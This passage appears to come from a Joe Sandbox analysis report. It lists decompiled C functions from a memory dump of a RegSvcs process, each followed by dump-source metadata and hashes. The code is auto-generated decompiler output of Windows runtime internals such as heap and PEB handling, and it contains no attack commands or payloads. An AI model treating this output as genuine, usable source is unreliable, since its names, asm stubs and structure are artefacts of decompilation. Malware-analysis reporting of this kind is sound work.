                                          					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
                                          					 *_t42 = _t22;
                                          					_t38 = _t42 + _t55 * 8;
                                          					 *_t42 = _t22 ^  *0x13e6110 ^ _t42;
                                          					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
                                          						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x13e6110 ^ _t38 ^  *_t38) & 0x7fff0000;
                                          					}
                                          				} else {
                                          					_t42 = 0;
                                          				}
                                          				return _t42;
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b275536d2fc9836d7c7b55162a5d71804b097da0e4b2074bb4fb31608e9d51e8
                                          • Instruction ID: 1e0d13e265669ce901d92c702ef79f23f8be0e42e5ec9e36400f1c67ba10ea0f
                                          • Opcode Fuzzy Hash: b275536d2fc9836d7c7b55162a5d71804b097da0e4b2074bb4fb31608e9d51e8
                                          • Instruction Fuzzy Hash: 8521C033A105259BCB29CB3CC801466F7EAEF8C31472A467ED812DB2A5EA70BD11C780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E0131AE73(intOrPtr __ecx, void* __edx) {
                                          				intOrPtr _v8;
                                          				void* _t19;
                                          				char* _t22;
                                          				signed char* _t24;
                                          				intOrPtr _t25;
                                          				intOrPtr _t27;
                                          				void* _t31;
                                          				intOrPtr _t36;
                                          				char* _t38;
                                          				signed char* _t42;
                                          
                                          				_push(__ecx);
                                          				_t31 = __edx;
                                          				_v8 = __ecx;
                                          				_t19 = E01317D50();
                                          				_t38 = 0x7ffe0384;
                                          				if(_t19 != 0) {
                                          					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				} else {
                                          					_t22 = 0x7ffe0384;
                                          				}
                                          				_t42 = 0x7ffe0385;
                                          				if( *_t22 != 0) {
                                          					if(E01317D50() == 0) {
                                          						_t24 = 0x7ffe0385;
                                          					} else {
                                          						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          					}
                                          					if(( *_t24 & 0x00000010) != 0) {
                                          						goto L17;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					_t27 = E01317D50();
                                          					if(_t27 != 0) {
                                          						_t27 =  *[fs:0x30];
                                          						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                          					}
                                          					if( *_t38 != 0) {
                                          						_t27 =  *[fs:0x30];
                                          						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                          							goto L5;
                                          						}
                                          						_t27 = E01317D50();
                                          						if(_t27 != 0) {
                                          							_t27 =  *[fs:0x30];
                                          							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                          						}
                                          						if(( *_t42 & 0x00000020) != 0) {
                                          							L17:
                                          							_t25 = _v8;
                                          							_t36 = 0;
                                          							if(_t25 != 0) {
                                          								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                          							}
                                          							_t27 = E01377794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                          						}
                                          						goto L5;
                                          					} else {
                                          						L5:
                                          						return _t27;
                                          					}
                                          				}
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: be961c2e7560184089425aab88da90e4833a33f1583d6c979b9e19fd6ed87980
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: 0321F9716026859FE71A9B2DC944B267BECEF44358F0A00A0DD048B75AD778DC40C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E0132FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				intOrPtr _v8;
                                          				void* _t19;
                                          				intOrPtr _t29;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t37;
                                          				intOrPtr* _t40;
                                          
                                          				_t35 = __edx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t37 = 0;
                                          				_v8 = __edx;
                                          				_t29 = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                          					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                          					L3:
                                          					_t19 = _a4 - 4;
                                          					if(_t19 != 0) {
                                          						if(_t19 != 1) {
                                          							L7:
                                          							return _t37;
                                          						}
                                          						if(_t35 == 0) {
                                          							L11:
                                          							_t37 = 0xc000000d;
                                          							goto L7;
                                          						}
                                          						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                          							_t35 = _v8;
                                          						}
                                          						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                          						goto L7;
                                          					}
                                          					if(_t29 == 0) {
                                          						goto L11;
                                          					}
                                          					_t32 =  *_t40;
                                          					if(_t32 != 0) {
                                          						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                          						E013076E2( *_t40);
                                          					}
                                          					 *_t40 = _t29;
                                          					goto L7;
                                          				}
                                          				_t40 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                          				if(_t40 == 0) {
                                          					_t37 = 0xc0000017;
                                          					goto L7;
                                          				}
                                          				_t35 = _v8;
                                          				 *_t40 = 0;
                                          				 *((intOrPtr*)(_t40 + 4)) = 0;
                                          				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                          				goto L3;
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: c0b0583a4c1a3825b20468eb574301a58e42d9be7423ca2a3028a86f08d56077
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: 1621A972600A54DBD736DF0DC540E66F7F9EB94A18F24856EE95A87A19D730EC00CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E0130841F(signed int __ecx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _t43;
                                          				signed int _t46;
                                          				signed int _t50;
                                          				signed int _t57;
                                          				signed int _t64;
                                          
                                          				_v16 = __ecx;
                                          				_t43 =  *0x7ffe0004;
                                          				_v8 = _t43;
                                          				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
                                          				_v12 = 0x7ffe0014;
                                          				if(_t43 < 0x1000000) {
                                          					while(1) {
                                          						_t46 =  *0x7ffe0324;
                                          						_t50 =  *0x7FFE0320;
                                          						if(_t46 ==  *0x7FFE0328) {
                                          							break;
                                          						}
                                          						asm("pause");
                                          					}
                                          					_t57 = _v12;
                                          					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
                                          				} else {
                                          					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
                                          				}
                                          				_push(0);
                                          				_push( &_v24);
                                          				E01339810();
                                          				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction ID: 68b8282ac6eb1d0119cd2eaa2fd3075e423a5a897402f22475702056318bd45e
                                          • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction Fuzzy Hash: D6219072E00119CBCB14CFA9C580A8AF7F9FB88354F664165ED08B7740C630AE04CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0132B390(void* __ecx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				signed char _t12;
                                          				signed int _t16;
                                          				signed int _t21;
                                          				void* _t28;
                                          				signed int _t30;
                                          				signed int _t36;
                                          				signed int _t41;
                                          
                                          				_push(__ecx);
                                          				_t41 = _a4 + 0xffffffb8;
                                          				E01312280(_t12, 0x13e8608);
                                          				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                          				asm("sbb edi, edi");
                                          				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                          				_v8 = _t36;
                                          				asm("lock cmpxchg [ebx], ecx");
                                          				_t30 = 1;
                                          				if(1 != 1) {
                                          					while(1) {
                                          						_t21 = _t30 & 0x00000006;
                                          						_t16 = _t30;
                                          						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                          						asm("lock cmpxchg [edi], esi");
                                          						if(_t16 == _t30) {
                                          							break;
                                          						}
                                          						_t30 = _t16;
                                          					}
                                          					_t36 = _v8;
                                          					if(_t21 == 2) {
                                          						_t16 = E013300C2(0x13e8608, 0, _t28);
                                          					}
                                          				}
                                          				if(_t36 != 0) {
                                          					_t16 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                          				}
                                          				return _t16;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f95ea24b938ec54e0fd776a61e7dd255cd0c00bbcaf76cf6338c3720d0f0c9ce
                                          • Instruction ID: f2f95ff93774e03370ad31c02e24a0df0860620d56444e50b221b5627eca357a
                                          • Opcode Fuzzy Hash: f95ea24b938ec54e0fd776a61e7dd255cd0c00bbcaf76cf6338c3720d0f0c9ce
                                          • Instruction Fuzzy Hash: 79116B377012209BCB29DA188D81A6BB39AFBC5378B384129DE16E7784CA719C02C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E012F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t41;
                                          				intOrPtr* _t46;
                                          				void* _t48;
                                          				intOrPtr _t50;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t65;
                                          				void* _t66;
                                          				void* _t68;
                                          
                                          				_push(0xc);
                                          				_push(0x13cf708);
                                          				E0134D08C(__ebx, __edi, __esi);
                                          				_t65 = __ecx;
                                          				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                          				if( *(__ecx + 0x24) != 0) {
                                          					_push( *(__ecx + 0x24));
                                          					E013395D0();
                                          					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                          				}
                                          				L6();
                                          				L6();
                                          				_push( *((intOrPtr*)(_t65 + 0x28)));
                                          				E013395D0();
                                          				_t33 =  *0x13e84c4; // 0x0
                                          				L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                          				_t37 =  *0x13e84c4; // 0x0
                                          				L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                          				_t41 =  *0x13e84c4; // 0x0
                                          				E01312280(L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13e86b4);
                                          				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                          				_t46 = _t65 + 0xe8;
                                          				_t62 =  *_t46;
                                          				_t60 =  *((intOrPtr*)(_t46 + 4));
                                          				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                          					_t61 = 3;
                                          					asm("int 0x29");
                                          					_push(_t65);
                                          					_t66 = _t61;
                                          					_t23 = _t66 + 0x14; // 0x8df8084c
                                          					_push( *_t23);
                                          					E013395D0();
                                          					_t24 = _t66 + 0x10; // 0x89e04d8b
                                          					_push( *_t24);
                                          					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                          					_t48 = E013395D0();
                                          					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                          					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                          					return _t48;
                                          				} else {
                                          					 *_t60 = _t62;
                                          					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                          					 *(_t68 - 4) = 0xfffffffe;
                                          					E012F9325();
                                          					_t50 =  *0x13e84c4; // 0x0
                                          					return E0134D0D1(L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                          				}
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ab2a485c38131c02df9c4c90f9c7cf6007484e4dfa7e6fbafcc0c888863863cc
                                          • Instruction ID: a99f43f994c352106c05ead136ce66e4e60a0c5f6bf9a635e8ad295c2db3b419
                                          • Opcode Fuzzy Hash: ab2a485c38131c02df9c4c90f9c7cf6007484e4dfa7e6fbafcc0c888863863cc
                                          • Instruction Fuzzy Hash: 73211931451602DFC726EF68CA40F59B7F9EF28708F1445ACE159966A1CA35E981CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E01384257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr* _t18;
                                          				intOrPtr _t24;
                                          				intOrPtr* _t27;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t31;
                                          				intOrPtr _t33;
                                          				intOrPtr* _t34;
                                          				intOrPtr* _t35;
                                          				void* _t37;
                                          				void* _t38;
                                          				void* _t39;
                                          				void* _t43;
                                          
                                          				_t39 = __eflags;
                                          				_t35 = __edi;
                                          				_push(8);
                                          				_push(0x13d08d0);
                                          				E0134D08C(__ebx, __edi, __esi);
                                          				_t37 = __ecx;
                                          				E013841E8(__ebx, __edi, __ecx, _t39);
                                          				E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                          				_t18 = _t37 + 8;
                                          				_t33 =  *_t18;
                                          				_t27 =  *((intOrPtr*)(_t18 + 4));
                                          				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                          					L8:
                                          					_push(3);
                                          					asm("int 0x29");
                                          				} else {
                                          					 *_t27 = _t33;
                                          					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                          					_t35 = 0x13e87e4;
                                          					_t18 =  *0x13e87e0; // 0x0
                                          					while(_t18 != 0) {
                                          						_t43 = _t18 -  *0x13e5cd0; // 0xffffffff
                                          						if(_t43 >= 0) {
                                          							_t31 =  *0x13e87e4; // 0x0
                                          							_t18 =  *_t31;
                                          							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                          								goto L8;
                                          							} else {
                                          								 *0x13e87e4 = _t18;
                                          								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                          								L012F7055(_t31 + 0xfffffff8);
                                          								_t24 =  *0x13e87e0; // 0x0
                                          								_t18 = _t24 - 1;
                                          								 *0x13e87e0 = _t18;
                                          								continue;
                                          							}
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          				L9:
                                          				__eflags =  *0x13e5cd0;
                                          				if( *0x13e5cd0 <= 0) {
                                          					L012F7055(_t37);
                                          				} else {
                                          					_t30 = _t37 + 8;
                                          					_t34 =  *0x13e87e8; // 0x0
                                          					__eflags =  *_t34 - _t35;
                                          					if( *_t34 != _t35) {
                                          						goto L8;
                                          					} else {
                                          						 *_t30 = _t35;
                                          						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                          						 *_t34 = _t30;
                                          						 *0x13e87e8 = _t30;
                                          						 *0x13e87e0 = _t18 + 1;
                                          					}
                                          				}
                                          				 *(_t38 - 4) = 0xfffffffe;
                                          				return E0134D0D1(L01384320());
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 536ba9796039f42ac243518ba926192578755fe662b9a70a48fc372873c63987
                                          • Instruction ID: 8fc5bd1db7c8a9935e6a5cdedd703bfe1ff1451928b28a51029847d1ab8fc9ea
                                          • Opcode Fuzzy Hash: 536ba9796039f42ac243518ba926192578755fe662b9a70a48fc372873c63987
                                          • Instruction Fuzzy Hash: 91213674A41706CFCB35EF68D100B14BBE5FF95358F6482AED2198FA99EB3194A1CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E01322397(intOrPtr _a4) {
                                          				void* __ebx;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t11;
                                          				void* _t19;
                                          				void* _t25;
                                          				void* _t26;
                                          				intOrPtr _t27;
                                          				void* _t28;
                                          				void* _t29;
                                          
                                          				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                          				if( *0x13e848c != 0) {
                                          					L0131FAD0(0x13e8610);
                                          					if( *0x13e848c == 0) {
                                          						E0131FA00(0x13e8610, _t19, _t27, 0x13e8610);
                                          						goto L1;
                                          					} else {
                                          						_push(0);
                                          						_push(_a4);
                                          						_t26 = 4;
                                          						_t29 = E01322581(0x13e8610, 0x12d50a0, _t26, _t27, _t28);
                                          						E0131FA00(0x13e8610, 0x12d50a0, _t27, 0x13e8610);
                                          					}
                                          				} else {
                                          					L1:
                                          					_t11 =  *0x13e8614; // 0x0
                                          					if(_t11 == 0) {
                                          						_t11 = E01334886(0x12d1088, 1, 0x13e8614);
                                          					}
                                          					_push(0);
                                          					_push(_a4);
                                          					_t25 = 4;
                                          					_t29 = E01322581(0x13e8610, (_t11 << 4) + 0x12d5070, _t25, _t27, _t28);
                                          				}
                                          				if(_t29 != 0) {
                                          					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                          					 *((char*)(_t29 + 0x40)) = 0;
                                          				}
                                          				return _t29;
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01f1ddc2c5efe51f3f62f7e91683ac0621e1dade76267261ab9114a92a166b9d
                                          • Instruction ID: e2baa187a5af5ee063238229dd9ddb9947a5e1bcd52e8c1147a84d86e8d9dd96
                                          • Opcode Fuzzy Hash: 01f1ddc2c5efe51f3f62f7e91683ac0621e1dade76267261ab9114a92a166b9d
                                          • Instruction Fuzzy Hash: 80114E32B4432567E734BA2DEC40F17B6DCFF60769F14846AFB06AB290C5B4D8448B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E013746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                          				signed short* _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				signed int _t22;
                                          				signed char _t23;
                                          				short _t32;
                                          				void* _t38;
                                          				char* _t40;
                                          
                                          				_v12 = __edx;
                                          				_t29 = 0;
                                          				_v8 = __ecx;
                                          				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                          				_t38 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                          				if(_t38 != 0) {
                                          					_t40 = _a4;
                                          					 *_t40 = 1;
                                          					E0133F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                          					_t22 = _v12 >> 1;
                                          					_t32 = 0x2e;
                                          					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                          					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                          					_t23 = E0132D268(_t38, 1);
                                          					asm("sbb al, al");
                                          					 *_t40 =  ~_t23 + 1;
                                          					L013177F0(_v16, 0, _t38);
                                          				} else {
                                          					 *_a4 = 0;
                                          					_t29 = 0xc0000017;
                                          				}
                                          				return _t29;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 61f7761356a2536ddf1c17e16a44cdf11030e3e4e915992622332262b38cffdf
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: 20112572904208BBC7159F5CD8808BEB7B9EF99318F10806EF944C7350DA359D51C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E013337F5(void* __ecx, intOrPtr* __edx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t6;
                                          				intOrPtr _t13;
                                          				intOrPtr* _t20;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          				intOrPtr* _t29;
                                          
                                          				_t27 = __edx;
                                          				_t28 = __ecx;
                                          				if(__edx == 0) {
                                          					E01312280(_t6, 0x13e8550);
                                          				}
                                          				_t29 = E0133387E(_t28);
                                          				if(_t29 == 0) {
                                          					L6:
                                          					if(_t27 == 0) {
                                          						E0130FFB0(0x13e8550, _t27, 0x13e8550);
                                          					}
                                          					if(_t29 == 0) {
                                          						return 0xc0000225;
                                          					} else {
                                          						if(_t27 != 0) {
                                          							goto L14;
                                          						}
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                          						goto L11;
                                          					}
                                          				} else {
                                          					_t13 =  *_t29;
                                          					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                          						L13:
                                          						_push(3);
                                          						asm("int 0x29");
                                          						L14:
                                          						 *_t27 = _t29;
                                          						L11:
                                          						return 0;
                                          					}
                                          					_t20 =  *((intOrPtr*)(_t29 + 4));
                                          					if( *_t20 != _t29) {
                                          						goto L13;
                                          					}
                                          					 *_t20 = _t13;
                                          					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                          					asm("btr eax, ecx");
                                          					goto L6;
                                          				}
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c9dd6565608f6ce86b6f9d048b246d414e494a3806f42569d85ef3e9397da50
                                          • Instruction ID: 0b8f629cbbbbf921aacbb96d1472ee4e5788c89d8a9fc5149b0d3059e8dbe5e9
                                          • Opcode Fuzzy Hash: 6c9dd6565608f6ce86b6f9d048b246d414e494a3806f42569d85ef3e9397da50
                                          • Instruction Fuzzy Hash: 4101D672A416219BC3378B1D9940E26BFEAFFC5B58B15806DEA458F255DB34C805C7C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0132002D() {
                                          				void* _t11;
                                          				char* _t14;
                                          				signed char* _t16;
                                          				char* _t27;
                                          				signed char* _t29;
                                          
                                          				_t11 = E01317D50();
                                          				_t27 = 0x7ffe0384;
                                          				if(_t11 != 0) {
                                          					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				} else {
                                          					_t14 = 0x7ffe0384;
                                          				}
                                          				_t29 = 0x7ffe0385;
                                          				if( *_t14 != 0) {
                                          					if(E01317D50() == 0) {
                                          						_t16 = 0x7ffe0385;
                                          					} else {
                                          						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          					}
                                          					if(( *_t16 & 0x00000040) != 0) {
                                          						goto L18;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(E01317D50() != 0) {
                                          						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					if( *_t27 != 0) {
                                          						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                          							goto L5;
                                          						}
                                          						if(E01317D50() != 0) {
                                          							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          						}
                                          						if(( *_t29 & 0x00000020) == 0) {
                                          							goto L5;
                                          						}
                                          						L18:
                                          						return 1;
                                          					} else {
                                          						L5:
                                          						return 0;
                                          					}
                                          				}
                                          			}









                                          Memory Dump Source
